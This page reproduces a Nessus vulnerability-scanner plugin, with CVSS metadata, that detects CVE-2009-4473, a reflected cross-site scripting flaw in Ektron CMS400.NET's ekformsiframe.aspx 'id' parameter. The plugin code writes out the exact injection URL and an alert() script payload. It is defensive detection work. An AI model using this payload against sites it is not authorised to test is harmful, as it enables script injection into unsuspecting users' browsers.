Lucene search

K
nessusThis script is Copyright (C) 2009-2022 Tenable Network Security, Inc.EKTRON_CMS400_XSS.NASL
HistorySep 24, 2009 - 12:00 a.m.

Ektron CMS400.NET id Parameter XSS

2009-09-2400:00:00
This script is Copyright (C) 2009-2022 Tenable Network Security, Inc.
www.tenable.com
25

4.3 Medium

CVSS2

Attack Vector

NETWORK

Attack Complexity

MEDIUM

Authentication

NONE

Confidentiality Impact

NONE

Integrity Impact

PARTIAL

Availability Impact

NONE

AV:N/AC:M/Au:N/C:N/I:P/A:N

0.002 Low

EPSS

Percentile

62.2%

The remote web server is hosting the Ektron CMS400.NET content management system. The installed version fails to properly sanitize user-supplied input to the ‘id’ parameter of the 'ekformsiframe.aspx script. An attacker, exploiting this flaw, could execute arbitrary script code in the browser of unsuspecting users.

Note that the ‘css’, ‘eca’, and ‘skin’ parameters are also reportedly affected, though Nessus has not checked for these.

#%NASL_MIN_LEVEL 70300
#
# (C) Tenable Network Security, Inc.
#

include('deprecated_nasl_level.inc');
include('compat.inc');

if (description)
{
  script_id(41607);
  script_version("1.15");
  script_set_attribute(attribute:"plugin_modification_date", value:"2022/04/11");

  script_cve_id("CVE-2009-4473");
  script_bugtraq_id(36279);
  script_xref(name:"SECUNIA", value:"36591");

  script_name(english:"Ektron CMS400.NET id Parameter XSS");

  script_set_attribute(attribute:"synopsis", value:
"The remote web server contains a .NET application that is affected by
a cross-site scripting vulnerability.");
  script_set_attribute(attribute:"description", value:
"The remote web server is hosting the Ektron CMS400.NET content 
management system. The installed version fails to properly sanitize
user-supplied input to the 'id' parameter of the 'ekformsiframe.aspx
script. An attacker, exploiting this flaw, could execute arbitrary
script code in the browser of unsuspecting users.

Note that the 'css', 'eca', and 'skin' parameters are also reportedly
affected, though Nessus has not checked for these.");
  script_set_attribute(attribute:"solution", value:
"Unknown at this time.");
  script_set_cvss_base_vector("CVSS2#AV:N/AC:M/Au:N/C:N/I:P/A:N");
  script_set_cvss_temporal_vector("CVSS2#E:H/RL:OF/RC:C");

  script_set_attribute(attribute:"exploitability_ease", value:"No exploit is required");
  script_set_attribute(attribute:"exploit_available", value:"false");
  script_set_attribute(attribute:"exploited_by_nessus", value:"true");
  script_cwe_id(79);

  script_set_attribute(attribute:"vuln_publication_date", value:"2009/09/04");
  script_set_attribute(attribute:"plugin_publication_date", value:"2009/09/24");

  script_set_attribute(attribute:"plugin_type", value:"remote");
  script_set_attribute(attribute:"cpe", value:"cpe:/a:ektron:cms4000.net");
  script_set_attribute(attribute:"thorough_tests", value:"true");
  script_end_attributes();

  script_category(ACT_ATTACK);
  script_family(english:"CGI abuses : XSS");

  script_copyright(english:"This script is Copyright (C) 2009-2022 Tenable Network Security, Inc.");

  script_dependencies("http_version.nasl", "cross_site_scripting.nasl");
  script_exclude_keys("Settings/disable_cgi_scanning");
  script_require_ports("Services/www", 80);

  exit(0);
}

include("global_settings.inc");
include("misc_func.inc");
include("http.inc");
include("url_func.inc");

port = get_http_port(default:80, no_xss: 1);

if (thorough_tests) dirs = make_list(list_uniq("/cms", "/cms400", "cms400.net", cgi_dirs()));
else dirs = make_list(cgi_dirs());

exploit = "<script>alert('Nessus')</script>";

#Test for the XSS vulnerability.
foreach dir (dirs)
{
  url = string(
          dir,
          '/WorkArea/ContentDesigner/ekformsiframe.aspx?id=">',
          urlencode(str:exploit)
  );
  res = http_send_recv3(method:"GET", item:url, port:port, exit_on_fail: 1);

  if(
    "Ektron ContentDesigner IFRAME" >< res[2] &&
    string('<body id="">', exploit, '" class=') >< res[2]
  )
  {
    if(report_verbosity > 0)
    {
      report = string(
        "\n",
        "Nessus was able to exploit this issue using the following URL :\n",
        "\n",
        url,
        "\n"
      );
      security_warning(port:port, extra:report);
    }
    else security_warning(port:port);
    set_kb_item(name:'www/'+port+'XSS', value:TRUE);
    exit(0);
  }
}
VendorProductVersionCPE
ektroncms4000.netcpe:/a:ektron:cms4000.net

4.3 Medium

CVSS2

Attack Vector

NETWORK

Attack Complexity

MEDIUM

Authentication

NONE

Confidentiality Impact

NONE

Integrity Impact

PARTIAL

Availability Impact

NONE

AV:N/AC:M/Au:N/C:N/I:P/A:N

0.002 Low

EPSS

Percentile

62.2%

Related for EKTRON_CMS400_XSS.NASL